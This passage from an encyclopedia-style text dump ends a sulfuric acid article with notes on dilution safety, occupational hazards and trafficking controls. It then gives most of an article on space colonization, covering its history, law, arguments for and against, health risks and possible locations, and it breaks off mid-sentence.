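delta_T = heat_released / (mass_mixture * CP_MIXTURE)  # K

print(f"Estimated temperature rise: {delta_T:.0f} K")  # roughly 20 K
```

Even this generous mass ratio warms the mixture by roughly 20 °C; reversing the ratio, by adding a little water to a large amount of acid, concentrates the same heat in a thin layer, which is the hazard described next.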
In contrast, addition of water to concentrated sulfuric acid results in a thin layer of water on top of the acid. Heat generated in this thin layer can cause the water to boil, leading to the dispersal of a sulfuric acid aerosol or, worse, an explosion. Preparation of solutions greater than 6 M (35%) in concentration is dangerous unless the acid is added slowly enough to allow the mixture sufficient time to cool; otherwise, the heat produced may be sufficient to boil the mixture. Efficient mechanical stirring and external cooling (such as an ice bath) are essential. Reaction rates roughly double for every 10 °C increase in temperature; therefore, the reaction will become more violent as dilution proceeds unless the mixture is given time to cool. Adding acid to warm water will cause a violent reaction.

On a laboratory scale, sulfuric acid can be diluted by pouring concentrated acid onto crushed ice made from de-ionized water. The ice melts in an endothermic process while dissolving the acid. The amount of heat needed to melt the ice in this process is greater than the amount of heat evolved by dissolving the acid, so the solution remains cold. After all the ice has melted, further dilution can take place using water.

Industrial hazards
Sulfuric acid is non-flammable. The main occupational risks posed by this acid are skin contact leading to burns (see above) and the inhalation of aerosols. Exposure to aerosols at high concentrations leads to immediate and severe irritation of the eyes, respiratory tract and mucous membranes; this ceases rapidly after exposure, although there is a risk of subsequent pulmonary edema if tissue damage has been more severe. At lower concentrations, the most commonly reported symptom of chronic exposure to sulfuric acid aerosols is erosion of the teeth, found in virtually all studies; indications of possible chronic damage to the respiratory tract were inconclusive as of 1997. Repeated occupational exposure to sulfuric acid mists may increase the chance of lung cancer by up to 64 percent. In the United States, the permissible exposure limit (PEL) for sulfuric acid is fixed at 1 mg/m3; limits in other countries are similar. There have been reports of sulfuric acid ingestion leading to vitamin B12 deficiency with subacute combined degeneration. The spinal cord is most often affected in such cases, but the optic nerves may show demyelination, loss of axons and gliosis.

Legal restrictions
International commerce of sulfuric acid is controlled under the United Nations Convention Against Illicit Traffic in Narcotic Drugs and Psychotropic Substances, 1988, which lists sulfuric acid under Table II of the convention as a chemical frequently used in the illicit manufacture of narcotic drugs or psychotropic substances.
Physical sciences
Inorganic compounds
null
29248
https://en.wikipedia.org/wiki/Space%20colonization
Space colonization
Space colonization (or extraterrestrial colonization) is the colonization of outer space and astronomical bodies. As such it is a process of occupation or control for exploitation, such as extraterrestrial mining, and possibly extraterrestrial settlement. Making territorial claims in space is prohibited by international space law, which defines space as a common heritage. International space law has had the goal of preventing colonial claims and the militarization of space, and has advocated the installation of international regimes to regulate access to and sharing of space, particularly for specific locations such as the limited space of geostationary orbit or the Moon.

To date, no permanent space settlement has been established, only temporary space habitats, nor has any extraterrestrial territory or land been internationally claimed. Currently, no government has plans for building a space colony. However, many proposals, speculations, and designs, particularly for extraterrestrial settlements, have been made through the years, and a considerable number of space colonization advocates and groups are active. SpaceX, currently the dominant private launch provider, has been the most prominent organization planning space colonization, on Mars, though it has not reached a development stage beyond launch and landing systems.

As a form of colonialism, space colonization is a multi-dimensional exploitation of people and environments, and in this sense it raises numerous socio-political questions. Many arguments for and against space settlement have been made. The two most common reasons in favor of colonization are, first, the survival of humans and life independent of Earth, making humans a multiplanetary species in the event of a planetary-scale disaster (natural or human-made), and, second, the commercial use of space, particularly to enable a more sustainable expansion of human society through the availability of additional resources in space, reducing environmental damage on, and exploitation of, Earth, for the sake of de-colonizing Earth. The most common objections include concerns that the commodification of the cosmos is likely to continue pre-existing detrimental processes such as environmental degradation, economic inequality and wars, enhancing the interests of the already powerful, particularly major economic and military institutions, instead of halting the space colonization process and investing in solving existing major environmental and social issues.

The mere construction of an extraterrestrial settlement, with the needed infrastructure, presents daunting technological, economic and social challenges. Space settlements are generally conceived as providing for nearly all (or all) the needs of large numbers of humans. The environment in space is very hostile to human life and not readily accessible, particularly for maintenance and supply. Settlement would require much advancement of currently primitive technologies, such as controlled ecological life-support systems. With the high cost of orbital spaceflight (around $1400 per kg, or $640 per pound, to low Earth orbit on a SpaceX Falcon Heavy), a space settlement would currently be massively expensive, but ongoing progress in reusable launch systems (possibly reaching $20 per kg to orbit) and in automated manufacturing and construction techniques aims to change that.

Definition
Space colonization has in a broad sense been referred to as space settlement, space humanization or space habitation.
Space colonization in a narrow sense refers to space settlements as envisioned by Gerard K. O'Neill, characterized by elements such as settlement and exploitation, as well as territorial claim. The concept in its broad sense has been applied to any permanent human presence, even robotic, particularly along with the term "settlement", being imprecisely applied to any human space habitat, from research stations to self-sustaining communities in space. The words colony and colonization are terms rooted in colonial history on Earth, making them human-geographic as well as particularly political terms. This broad use for any permanent human activity and development in space has been criticized, particularly as colonialist and undifferentiated (see Objections below). In this sense, a colony is a settlement that claims territory and exploits it for the settlers or their metropole; a human outpost, while possibly a space habitat or even a space settlement, does therefore not automatically constitute a space colony, though entrepôts like trade factories (trading posts) did often grow into colonies. Any basing can thus be part of colonization, while colonization can be understood as a process open to further claims beyond basing. The International Space Station, the longest-occupied extraterrestrial habitat thus far, does not claim territory and thus is not usually considered a colony. That said, satellites have been identified by Moriba Jah as colonizing the orbits they take, occupying those orbits in a form of ownership instead of stewardship.

History
When the first space flight programs commenced, they partly used – and have continued to use – colonial spaces on Earth, such as places of indigenous peoples at the RAAF Woomera Range Complex and the Guiana Space Centre, or, contemporarily for astronomy, at the Mauna Kea telescopes. When orbital spaceflight was achieved in the 1950s, colonialism was still a strong international project, easing, for example, the United States' advancement of its space program, and of space in general, as part of a "New Frontier". At the same time as the beginning of the Space Age, decolonization again gained force, producing many newly independent countries. These newly independent countries confronted spacefaring countries, demanding an anti-colonial stance and regulation of space activity when space law was raised and negotiated internationally. Fears of confrontation over land grabs and an arms race in space between the few countries with spaceflight capabilities grew, and were ultimately shared by the spacefaring countries themselves. This produced the wording of the agreed international space law, starting with the Outer Space Treaty of 1967, which calls space a "province of all mankind" and secures provisions for international regulation and sharing of outer space.

The advent of geostationary satellites raised the issue of limited room in outer space. A group of equatorial countries, all of them former colonies of colonial empires but without spaceflight capabilities, signed the Bogota Declaration in 1976. These countries declared geostationary orbit a limited natural resource belonging to the equatorial countries directly below, seeing it not as part of outer space, humanity's commons. Through this, the declaration challenged the dominance of geostationary orbit by spacefaring countries, identifying that dominance as imperialistic.
Furthermore, this dominance has foreshadowed threats to the accessibility of space guaranteed by the Outer Space Treaty, as in the case of space debris, which is ever increasing because of a lack of access regulation. In 1977, the first sustained space habitat, the Salyut 6 station, was put into Earth's orbit. The first space stations were eventually succeeded by the ISS, today's largest human outpost in space and the closest to a space settlement. Built and operated under a multilateral regime, it has become a blueprint for future stations, such as around and possibly on the Moon. An international regime for lunar activity was demanded by the international Moon Treaty, but such a regime is currently being developed multilaterally, as with the Artemis Accords. The only habitation on a different celestial body so far has been the temporary habitats of the crewed lunar landers. Similar to the Artemis program, China is leading an effort to develop a lunar base, called the International Lunar Research Station, beginning in the 2030s.

Conceptual
In the first half of the 17th century, John Wilkins suggested in A Discourse Concerning a New Planet that future adventurers like Francis Drake and Christopher Columbus might reach the Moon and allow people to live there. The first known work on space colonization was the 1869 novella The Brick Moon by Edward Everett Hale, about an inhabited artificial satellite. In 1897, Kurd Lasswitz also wrote about space colonies. The Russian rocket science pioneer Konstantin Tsiolkovsky foresaw elements of the space community in his book Beyond Planet Earth, written about 1900. Tsiolkovsky imagined his space travelers building greenhouses and raising crops in space, and believed that going into space would help perfect human beings, leading to immortality and peace. One of the first to speak about space colonization was Cecil Rhodes, who in 1902 spoke about "these stars that you see overhead at night, these vast worlds which we can never reach", adding "I would annex the planets if I could; I often think of that. It makes me sad to see them so clear and yet so far". In the 1920s, John Desmond Bernal, Hermann Oberth, Guido von Pirquet and Herman Noordung further developed the idea. Wernher von Braun contributed his ideas in a 1952 Colliers magazine article. In the 1950s and 1960s, Dandridge M. Cole published his ideas. Another seminal book on the subject was The High Frontier: Human Colonies in Space by Gerard K. O'Neill in 1977, which was followed the same year by Colonies in Space by T. A. Heppenheimer. Marianne J. Dyson wrote Home on the Moon: Living on a Space Frontier in 2003; Peter Eckart wrote the Lunar Base Handbook in 2006; and Harrison Schmitt wrote Return to the Moon in 2007.

Law, governance, and sovereignty
Space activity is legally based on the Outer Space Treaty, the main international treaty, but space law has become a larger legal field that includes other international agreements, such as the significantly less ratified Moon Treaty, as well as diverse national laws. The Outer Space Treaty established the basic ramifications for space activity in article one: "The exploration and use of outer space, including the Moon and other celestial bodies, shall be carried out for the benefit and in the interests of all countries, irrespective of their degree of economic or scientific development, and shall be the province of all mankind."
It continued in article two by stating: "Outer space, including the Moon and other celestial bodies, is not subject to national appropriation by claim of sovereignty, by means of use or occupation, or by any other means." The development of international space law has revolved largely around outer space being defined as the common heritage of mankind. The Magna Carta of Space, presented by William A. Hyman in 1966, framed outer space explicitly not as terra nullius but as res communis, which subsequently influenced the work of the United Nations Committee on the Peaceful Uses of Outer Space.

Reasons

Survival of human civilization
A primary argument calling for space colonization is the long-term survival of human civilization and terrestrial life. By developing alternative locations off Earth, the planet's species, including humans, could live on in the event of natural or human-made disasters on Earth. On two occasions, theoretical physicist and cosmologist Stephen Hawking argued for space colonization as a means of saving humanity. In 2001, Hawking predicted that the human race would become extinct within the next thousand years unless colonies could be established in space. In 2010, he stated that humanity faces two options: either we colonize space within the next two hundred years, or we face the long-term prospect of extinction. In 2005, then NASA Administrator Michael Griffin identified space colonization as the ultimate goal of current spaceflight programs. Louis J. Halle Jr., formerly of the United States Department of State, wrote in Foreign Affairs (Summer 1980) that the colonization of space would protect humanity in the event of global nuclear warfare. The physicist Paul Davies also supports the view that if a planetary catastrophe threatens the survival of the human species on Earth, a self-sufficient colony could "reverse-colonize" Earth and restore human civilization. The author and journalist William E. Burrows and the biochemist Robert Shapiro proposed a private project, the Alliance to Rescue Civilization, with the goal of establishing an off-Earth "backup" of human civilization. Based on his Copernican principle, J. Richard Gott has estimated that the human race could survive for another 7.8 million years, but is not likely ever to colonize other planets. However, he expressed the hope to be proven wrong, because "colonizing other worlds is our best chance to hedge our bets and improve the survival prospects of our species".

In a theoretical study from 2019, a group of researchers pondered the long-term trajectory of human civilization, arguing that, due to Earth's finitude as well as the limited duration of the Solar System, mankind's survival into the far future will very likely require extensive space colonization. This 'astronomical trajectory' of mankind, as it is termed, could come about in four steps. In the first step, space colonies could be established at various habitable locations – be it in outer space or on celestial bodies away from Earth – and allowed to remain temporarily dependent on support from Earth. In the second step, these colonies could gradually become self-sufficient, enabling them to survive if or when the mother civilization on Earth fails or dies. In the third step, the colonies could develop and expand their habitation by themselves on their space stations or celestial bodies, for example via terraforming.
In the fourth step, the colonies could self-replicate and establish new colonies further into space, a process that could then repeat itself and continue at an exponential rate throughout the cosmos. However, this astronomical trajectory may not be a lasting one, as it would most likely be interrupted and eventually decline due to resource depletion or straining competition between various human factions, bringing about some 'star wars' scenario.

Vast resources in space
Resources in space, both in materials and energy, are enormous. The Solar System has enough material and energy to support a population anywhere from several thousand to over a billion times the current Earth-based human population, with most of the energy coming from the Sun itself. Asteroid mining would likely be a key player in space colonization: water and materials to make structures and shielding can easily be found in asteroids, and instead of resupplying from Earth, mining and fuel stations could be established on asteroids to facilitate better space travel. Optical mining is the term NASA uses to describe extracting materials from asteroids. NASA believes that using propellant derived from asteroids for exploration of the Moon, Mars, and beyond would save $100 billion. If funding and technology come sooner than estimated, asteroid mining might be possible within a decade.

Although some of the infrastructure requirements above can already be easily produced on Earth and would therefore not be very valuable as trade items (oxygen, water, base metal ores, silicates, etc.), other high-value items are more abundant, more easily produced, of higher quality, or can only be produced in space. These could provide (over the long term) a high return on the initial investment in space infrastructure. Some of these high-value trade goods include precious metals, gemstones, power, solar cells, ball bearings, semiconductors, and pharmaceuticals. The mining and extraction of metals from a small asteroid the size of 3554 Amun or (6178) 1986 DA, both small near-Earth asteroids, may yield 30 times as much metal as humans have mined throughout history. A metal asteroid this size would be worth approximately US$20 trillion at 2001 market prices. The main impediments to commercial exploitation of these resources are the very high cost of initial investment, the very long period required for the expected return on those investments (the Eros Project plans a 50-year development), and the fact that the venture has never been carried out before – the high-risk nature of the investment.

Expansion with fewer negative consequences
Expansion of humans and technological progress has usually resulted in some form of environmental devastation, and destruction of ecosystems and their accompanying wildlife. In the past, expansion has often come at the expense of displacing many indigenous peoples, the resulting treatment of these peoples ranging anywhere from encroachment to genocide. Because space has no known life, this need not be a consequence, as some space settlement advocates have pointed out. However, on some bodies of the Solar System there is the potential for extant native lifeforms, so the negative consequences of space colonization cannot be dismissed. Counterarguments state that changing only the location, but not the logic, of exploitation will not create a more sustainable future.

Alleviating overpopulation and resource demand
An argument for space colonization is to mitigate proposed impacts of overpopulation of Earth, such as resource depletion.
If the resources of space were opened to use and viable life-supporting habitats were built, Earth would no longer define the limitations of growth. Although many of Earth's resources are non-renewable, off-planet colonies could satisfy the majority of the planet's resource requirements. With the availability of extraterrestrial resources, demand on terrestrial ones would decline. Proponents of this idea include Stephen Hawking and Gerard K. O'Neill. Others, including cosmologist Carl Sagan and science fiction writers Arthur C. Clarke and Isaac Asimov, have argued that shipping any excess population into space is not a viable solution to human overpopulation. According to Clarke, "the population battle must be fought or won here on Earth". The problem for these authors is not the lack of resources in space (as shown in books such as Mining the Sky), but the physical impracticality of shipping vast numbers of people into space to "solve" overpopulation on Earth.

Other arguments
Advocates for space colonization cite a presumed innate human drive to explore and discover, and call it a quality at the core of progress and thriving civilizations. Nick Bostrom has argued that, from a utilitarian perspective, space colonization should be a chief goal as it would enable a very large population to live for a very long time (possibly billions of years), which would produce an enormous amount of utility (or happiness). He claims that it is more important to reduce existential risks to increase the probability of eventual colonization than to accelerate technological development so that space colonization could happen sooner. In his paper, he assumes that the created lives will have positive ethical value despite the problem of suffering. In a 2001 interview, Freeman Dyson, J. Richard Gott and Sid Goldstein were asked for reasons why some humans should live in space. Their answers were:
Spread life and beauty throughout the universe
Ensure the survival of our species
Make money through new forms of space commercialization such as solar-power satellites, asteroid mining, and space manufacturing
Save the environment of Earth by moving people and industry into space
Biotic ethics is a branch of ethics that values life itself. For biotic ethics, and their extension to space as panbiotic ethics, it is a human purpose to secure and propagate life and to use space to maximize life.

Difficulties
There would be many problems in colonizing the outer Solar System. These include:
Distance from Earth – The outer planets are much farther from Earth than the inner planets, and would therefore be harder and more time-consuming to reach. In addition, return voyages may well be prohibitive considering the time and distance.
Extreme cold – Temperatures are near absolute zero in many parts of the outer Solar System.
Power – Solar power is many times less concentrated in the outer Solar System than in the inner Solar System. It is unclear whether it would be usable there, with some form of concentrating mirrors, or whether nuclear power would be necessary. There have also been proposals to use the gravitational potential energy of planets or dwarf planets with moons.
Effects of low gravity on the human body – All moons of the gas giants and all outer dwarf planets have very low gravity, the highest being Io's gravity (0.183 g), which is less than 1/5 of the Earth's gravity.
Since the Apollo program, all crewed spaceflight has been constrained to low Earth orbit, and there has been no opportunity to test the effects of such low gravitational accelerations on the human body. It is speculated (but not confirmed) that low-gravity environments might have effects very similar to long-term exposure to weightlessness. Such effects could be avoided by rotating spacecraft that create artificial gravity.
Dust – Breathing risks are associated with fine dust from rocky surface objects, for reasons similar to the harmful effects of lunar dust.

Criticisms
Space colonization has been seen as a relief to the problem of human overpopulation as early as 1758, and was listed as one of Stephen Hawking's reasons for pursuing space exploration. Critics note, however, that a slowdown in population growth rates since the 1980s has alleviated the risk of overpopulation. Critics also argue that the costs of commercial activity in space are too high to be profitable against Earth-based industries, and hence that significant exploitation of space resources is unlikely in the foreseeable future.

Other objections include concerns that the forthcoming colonization and commodification of the cosmos is likely to enhance the interests of the already powerful, including major economic and military institutions (e.g. the large financial institutions, the major aerospace companies and the military–industrial complex), to lead to new wars, and to exacerbate pre-existing exploitation of workers and resources, economic inequality, poverty, social division and marginalization, environmental degradation, and other detrimental processes or institutions. Additional concerns include creating a culture in which humans are no longer seen as human, but rather as material assets. The issues of human dignity, morality, philosophy, culture, bioethics, and the threat of megalomaniac leaders in these new "societies" would all have to be addressed in order for space colonization to meet the psychological and social needs of people living in isolated colonies.

As an alternative or addendum for the future of the human race, many science fiction writers have focused on the realm of 'inner space', that is, the computer-aided exploration of the human mind and human consciousness – possibly en route, developmentally, to a Matrioshka brain. Robotic spacecraft are proposed as an alternative that gains many of the same scientific advantages without the limited mission duration and high cost of life support and return transportation involved in human missions. A corollary to the Fermi paradox – "nobody else is doing it" – is the argument that, because no evidence of alien colonization technology exists, it is statistically unlikely to even be possible to use that same level of technology ourselves.

Colonialism
Space colonization has been discussed as a postcolonial continuation of imperialism and colonialism, calling for decolonization instead of colonization. Critics argue that the present politico-legal regimes and their philosophic grounding advantage imperialist development of space, that key decision-makers in space colonization are often wealthy elites affiliated with private corporations, and that space colonization would primarily appeal to their peers rather than ordinary citizens. Furthermore, it is argued that there is a need for inclusive and democratic participation and implementation of any space exploration, infrastructure or habitation.
According to space law expert Michael Dodge, existing space law, such as the Outer Space Treaty, guarantees access to space, but does not enforce social inclusiveness or regulate non-state actors. In particular, the narrative of the "New Frontier" has been criticized as an unreflective continuation of settler colonialism and manifest destiny, continuing the narrative of exploration as fundamental to the assumed human nature. Joon Yun considers space colonization as a solution to human survival and global problems like pollution to be imperialist; others have identified space as a new sacrifice zone of colonialism. Furthermore, the understanding of space as empty and separate is considered a continuation of terra nullius. Natalie B. Trevino argues that it is not colonialism but coloniality that will be carried into space if it is not reflected on. More specifically, the advocacy for territorial colonization of Mars has been called surfacism, in contrast to habitation in the atmospheric space of Venus, a concept similar to Thomas Gold's surface chauvinism. More generally, space infrastructure such as the Mauna Kea Observatories has also been criticized and protested against as colonialist. The Guiana Space Centre has likewise been the site of anti-colonial protests, connecting colonization as an issue on Earth and in space. In regard to the scenario of extraterrestrial first contact, it has been argued that the employment of colonial language would endanger such first impressions and encounters. Furthermore, spaceflight as a whole, and space law more particularly, has been criticized as a postcolonial project for being built on a colonial legacy and for not facilitating the sharing of access to space and its benefits, too often allowing spaceflight to be used to sustain colonialism and imperialism, most of all on Earth.

Planetary protection
Agencies conducting interplanetary missions are guided by COSPAR's planetary protection policies to have at most 300,000 spores on the exterior of the craft, with more thorough sterilization required if the craft contacts "special regions" containing water; otherwise it could contaminate life-detection experiments or the planet itself. It is impossible to sterilize human missions to this level, as humans are typically host to a hundred trillion microorganisms of thousands of species of the human microbiome, and these cannot be removed while preserving the life of the human. Containment seems the only option, but it is a major challenge in the event of a hard landing (i.e. crash). There have been several planetary workshops on this issue, but with no final guidelines for a way forward yet. Human explorers could also inadvertently contaminate Earth if they return to the planet while carrying extraterrestrial microorganisms.

Physical and mental health risks to colonists
The health of the humans who may participate in a colonization venture would be subject to increased physical, mental and emotional risks. NASA learned that – without gravity – bones lose minerals, causing osteoporosis. Bone density may decrease by 1% per month, which may lead to a greater risk of osteoporosis-related fractures later in life. Fluid shifts towards the head may cause vision problems. NASA found that isolation in closed environments aboard the International Space Station led to depression, sleep disorders, and diminished personal interactions, likely due to confined spaces and the monotony and boredom of long space flight.
Circadian rhythm may also be susceptible to the effects of space life, owing to the disrupted timing of sunset and sunrise and its effects on sleep. This can lead to exhaustion, as well as other sleep problems such as insomnia, which can reduce colonists' productivity and lead to mental health disorders. High-energy radiation is another health risk colonists would face, as radiation in deep space is deadlier than what astronauts face now in low Earth orbit. Metal shielding on space vehicles protects against only 25–30% of space radiation, possibly leaving colonists exposed to the other 70% of radiation and its short- and long-term health complications.

Risk of astronomical suffering
Space colonization, while often seen as a bold step for humanity, could, some scholars argue, result in catastrophic outcomes, with the potential creation of vast suffering, including extreme forms, outweighing the perceived benefits. Scholars like Phil Torres and Daniel Deudney argue that expansion into space could escalate perpetual conflict and insecurity, and even increase risks of human extinction. This aligns with the notion that space expansion amplifies both suffering in non-extinction scenarios and risks tied to advanced AI systems. Furthermore, the "astronomical atrocity problem" raises ethical concerns about whether positive outcomes can ever justify immense suffering. According to some authors, strategic approaches are crucial: if space colonization is inevitable, it should prioritize compassionate agents to mitigate risks of dystopian outcomes.

Locations
Space colonization has been envisioned at many different locations inside and outside the Solar System, but most commonly at Mars and the Moon. Altogether it has been argued that space colonization extends from Earth: it builds on the colonization of Earth, extends colonialism into space from colonial land on Earth used for spaceflight, as with the Guiana Space Centre, and builds facilities for space colonization, as with Starbase. As a system it often incorporates different locations, from Earth, the orbital space around it and the Moon to almost any location beyond the Moon.

Near-Earth space

Earth orbit
Geostationary orbit was an early issue in the discussion of space colonization, with equatorial countries arguing for special rights to the orbit (see the Bogota Declaration above). Space debris, particularly in low Earth orbit, has been characterized as a product of colonization, occupying orbits and hindering access to space through excessive pollution with debris, with drastic increases in the course of military activity and in the absence of management. Most of the delta-v budget, and thus propellant, of a launch is used in bringing a spacecraft to low Earth orbit. This is the main reason why Jerry Pournelle said, "If you can get your ship into orbit, you're halfway to anywhere". The main advantages of constructing a space settlement in Earth orbit are therefore accessibility from Earth and already-existing economic motives such as space hotels and space manufacturing. However, a big disadvantage is that orbit does not host any materials available for exploitation. Space colonization altogether might eventually demand lifting vast amounts of payload into orbit, making thousands of daily launches potentially unsustainable. Various theoretical concepts, such as orbital rings and skyhooks, have been proposed to reduce the cost of accessing space.

Moon
The Moon is discussed as a target for colonization due to its proximity to Earth and lower escape velocity.
The Moon is reachable from Earth in three days and has near-instant communication with Earth, minable minerals, no atmosphere, and low gravity, making it extremely easy to ship materials and products to orbit. Abundant ice is trapped in permanently shadowed craters near the poles, which could support the water needs of a lunar colony, though indications that mercury is similarly trapped there may pose health concerns. Native precious metals, such as gold, silver, and probably platinum, are also concentrated at the lunar poles by electrostatic dust transport. Only a few materials on the Moon have been identified as making economic sense to ship directly back to Earth: helium-3 (for fusion power) and rare-earth minerals (for electronics). Instead, it makes more sense for such materials to be used in space or turned into valuable products for export. However, the Moon's lack of atmosphere provides no protection from space radiation or meteoroids, so lunar lava tubes have been proposed as sites offering protection. The Moon's low surface gravity is also a concern, as it is unknown whether 1/6 g is enough to maintain human health for long periods. Since the Moon has extreme temperature swings and toxic lunar regolith, it is argued by some that the Moon will not become a place of habitation, but will instead attract polluting extraction and manufacturing industries. It has further been argued that moving these industries to the Moon could help protect the Earth's environment and allow poorer countries to be released from the shackles of neocolonialism by wealthier countries. In the space colonization framework, the Moon would be transformed into an industrial hub of the Solar System.

Interest in establishing a moonbase has increased in the 21st century, with the Moon seen as an intermediate step to Mars colonization. European Space Agency (ESA) head Jan Woerner, at the International Astronautical Congress in Bremen, Germany, in October 2018, proposed cooperation among countries and companies on lunar capabilities, a concept referred to as the Moon Village. In a December 2017 directive, the first Trump administration steered NASA to include a lunar mission on the pathway to other beyond-Earth-orbit (BEO) destinations. In 2023, the U.S. Defense Department started a study of the infrastructure and capabilities required to develop a moon-based economy over the following ten years. As of 2024, China, together with other countries, has declared its intent to establish the International Lunar Research Station, while the United States is proceeding with partner countries on its Artemis program, including moonbases near permanently shadowed craters at the poles in the 2030s. The Chinese Lunar Exploration Program has been identified as intended to bolster China's political influence and enhance its bid for superpower status, with the United States seeking to maintain its position as the leading space power.

Lagrange points
Another near-Earth possibility are the stable Earth–Moon Lagrange points L4 and L5, at which a space colony can float indefinitely. The L5 Society was founded to promote settlement by building space stations at these points. Gerard K. O'Neill suggested in 1974 that the L5 point, in particular, could fit several thousand floating colonies, and would allow easy travel to and from the colonies due to the shallow effective potential at this point.
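For reference, the "effective potential" meant here is the standard co-rotating-frame potential of the circular restricted three-body problem, a textbook expression rather than one given in this text:

```latex
% Effective potential in the frame co-rotating with the Earth-Moon system
% (circular restricted three-body problem): r1 and r2 are distances to the
% Earth and the Moon, rho is the distance from the rotation axis through
% the barycenter, and omega is the system's orbital angular velocity.
\begin{equation}
\Omega(\mathbf{r}) \;=\; \frac{G M_{\oplus}}{r_1} \;+\; \frac{G M_{\mathrm{Moon}}}{r_2}
  \;+\; \frac{1}{2}\,\omega^{2} \rho^{2}
\end{equation}
```

Near L4 and L5 the gradient of this potential nearly vanishes over a large region, which is why O'Neill argued that many colonies could share the vicinity while spending little propellant on station-keeping.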
Mars
The hypothetical colonization of Mars has received interest from public space agencies and private corporations, and has received extensive treatment in science fiction writing, film, and art. While there have been many plans for a human Mars mission, including comparatively affordable ones such as Mars Direct, none has been realized as of 2024. Both the United States and China have plans to send humans to Mars sometime in the 2040s, but these plans are not backed with hardware and funding. However, SpaceX is currently developing Starship, a super-heavy-lift reusable launch vehicle, with a vision of sending humans to Mars. As of November 2024, the company plans to send five uncrewed Starships to Mars in either the 2026 or the 2028–2029 launch window, and SpaceX's CEO Elon Musk has repeatedly stated that he will back the Mars efforts financially and politically.

Mars is more suitable for habitation than the Moon, with stronger gravity, a rich supply of the materials needed for life, a day/night cycle nearly identical to Earth's, and a thin atmosphere that protects against micrometeoroids. The main disadvantages of Mars compared to the Moon are the six-to-nine-month transit time and the infrequent launch windows, which occur approximately every two years. Without in situ resource utilization, Mars colonization would be nearly impossible, as it would require bringing thousands of tons of payload to sustain a handful of astronauts. If Martian materials can be used to make propellant (such as methane via the Sabatier process, CO2 + 4 H2 → CH4 + 2 H2O) and supplies (such as oxygen for crews), the amount of supplies that must be brought to Mars can be greatly reduced. Even then, Mars colonies will not be economically viable in the near term, so reasons for colonizing Mars will be mostly ideological and prestige-based, such as a desire for freedom.

Other inner Solar System bodies

Mercury
Mercury is rich in metals and volatiles, as well as solar energy. However, Mercury is the most energy-consuming body in the Solar System to land on for spacecraft launched from Earth, and astronauts there must contend with the extreme temperature differential and radiation. Once thought to be a volatile-depleted body like the Moon, Mercury is now known to be volatile-rich, surprisingly richer in volatiles than any other terrestrial body in the inner Solar System. The planet also receives six and a half times the solar flux of the Earth/Moon system, making solar energy an effective power source; it could be harnessed through orbital solar arrays and beamed to the surface or exported to other planets. Geologist Stephen Gillett suggested in 1996 that this could make Mercury an ideal place to build and launch solar sail spacecraft, which could be launched as folded "chunks" by a mass driver from Mercury's surface. Once in space, the solar sails would deploy. Solar energy for the mass driver should be easy to produce, and solar sails near Mercury would have 6.5 times the thrust they do near Earth. This could make Mercury an ideal place to acquire materials useful in building hardware to send to (and terraform) Venus. Vast solar collectors could also be built on or near Mercury to produce power for large-scale engineering activities such as laser-pushed light sails to nearby star systems. As Mercury has essentially no axial tilt, crater floors near its poles lie in eternal darkness, never seeing the Sun. They function as cold traps, trapping volatiles for geological periods. It is estimated that the poles of Mercury contain 10¹⁴–10¹⁵ kg of water, likely covered by about 5.65×10⁹ m³ of hydrocarbons.
This would make agriculture possible. It has been suggested that plant varieties could be developed to take advantage of the high light intensity and the long day of Mercury. The poles do not experience the significant day–night variations the rest of Mercury does, making them the best place on the planet to begin a colony. Another option is to live underground, where day–night variations would be damped enough that temperatures would stay roughly constant. There are indications that Mercury contains lava tubes, like the Moon and Mars, which would be suitable for this purpose. Underground temperatures in a ring around Mercury's poles can reach room temperature on Earth, 22±1 °C, at depths starting from about 0.7 m. This presence of volatiles and abundance of energy has led Alexander Bolonkin and James Shifflett to consider Mercury preferable to Mars for colonization. Yet a third option could be to move continually so as to stay on the night side, as Mercury's 176-day-long day–night cycle means that the terminator travels very slowly. Because Mercury is very dense, its surface gravity is 0.38 g like Mars's, even though it is a smaller planet. This would be easier to adjust to than lunar gravity (0.16 g), while still offering the advantage of a lower escape velocity from Mercury than from Earth. Mercury's proximity gives it advantages over the asteroids and outer planets, and its short synodic period means that launch windows from Earth to Mercury are more frequent than those from Earth to Venus or Mars. On the downside, a Mercury colony would require significant shielding from radiation and solar flares, and since Mercury is airless, decompression and temperature extremes would be constant risks.

Venus
Though the surface of Venus is extremely hostile, habitats floating high in the atmosphere of Venus would be fairly habitable, with a temperature of around 50 °C and a pressure similar to that at Earth's sea level. However, beside tourism opportunities, the economic benefit of a Venusian colony is minimal.

Asteroid belt
Asteroids could provide enough material in the form of water, air, fuel, metal, soil, and nutrients to support ten to a hundred trillion humans in space. Many asteroids contain minerals that are inherently valuable, such as rare earths and precious metals. However, low gravity, distance from Earth and the dispersed nature of their orbits make it difficult to settle on small asteroids.

Giant planets
There have also been proposals to place robotic aerostats in the upper atmospheres of the Solar System's giant planets for exploration and possibly mining of helium-3, which could have a very high value per unit mass as a thermonuclear fuel. Robert Zubrin identified Saturn, Uranus and Neptune as "the Persian Gulf of the Solar System", being the largest sources of deuterium and helium-3 to drive a fusion economy, with Saturn the most important and most valuable of the three because of its relative proximity, low radiation, and large system of moons. On the other hand, planetary scientist John Lewis, in his 1997 book Mining the Sky, insists that Uranus is the likeliest place to mine helium-3 because of its significantly shallower gravity well, which makes it easier for a laden tanker spacecraft to thrust itself away. Furthermore, Uranus is an ice giant, which would likely make it easier to separate the helium from the atmosphere. Because Uranus has the lowest escape velocity of the four giant planets, it has been proposed as a mining site for helium-3.
If human supervision of the robotic activity proved necessary, one of Uranus's natural satellites might serve as a base. It is hypothesized that one of Neptune's satellites could be used for colonization. Triton's surface shows signs of extensive geological activity that implies a subsurface ocean, perhaps composed of ammonia/water. If technology advanced to the point that tapping such geothermal energy was possible, it could make colonizing a cryogenic world like Triton feasible, supplemented by nuclear fusion power. Moons of outer planets Human missions to the outer planets would need to arrive quickly due to the effects of space radiation and microgravity along the journey. In 2012, Thomas B. Kerwick wrote that the distance to the outer planets made their human exploration impractical for now, noting that travel times for round trips to Mars were estimated at two years, and that the closest approach of Jupiter to Earth is over ten times farther than the closest approach of Mars to Earth. However, he noted that this could change with "significant advancement on spacecraft design". Nuclear-thermal or nuclear-electric engines have been suggested as a way to make the journey to Jupiter in a reasonable amount of time. Another possibility would be plasma magnet sails, a technology already suggested for rapidly sending a probe to Jupiter. The cold would also be a factor, necessitating a robust source of heat energy for spacesuits and bases. Most of the larger moons of the outer planets contain water ice, liquid water, and organic compounds that might be useful for sustaining human life. Robert Zubrin has suggested Saturn, Uranus, and Neptune as advantageous locations for colonization because their atmospheres are good sources of fusion fuels, such as 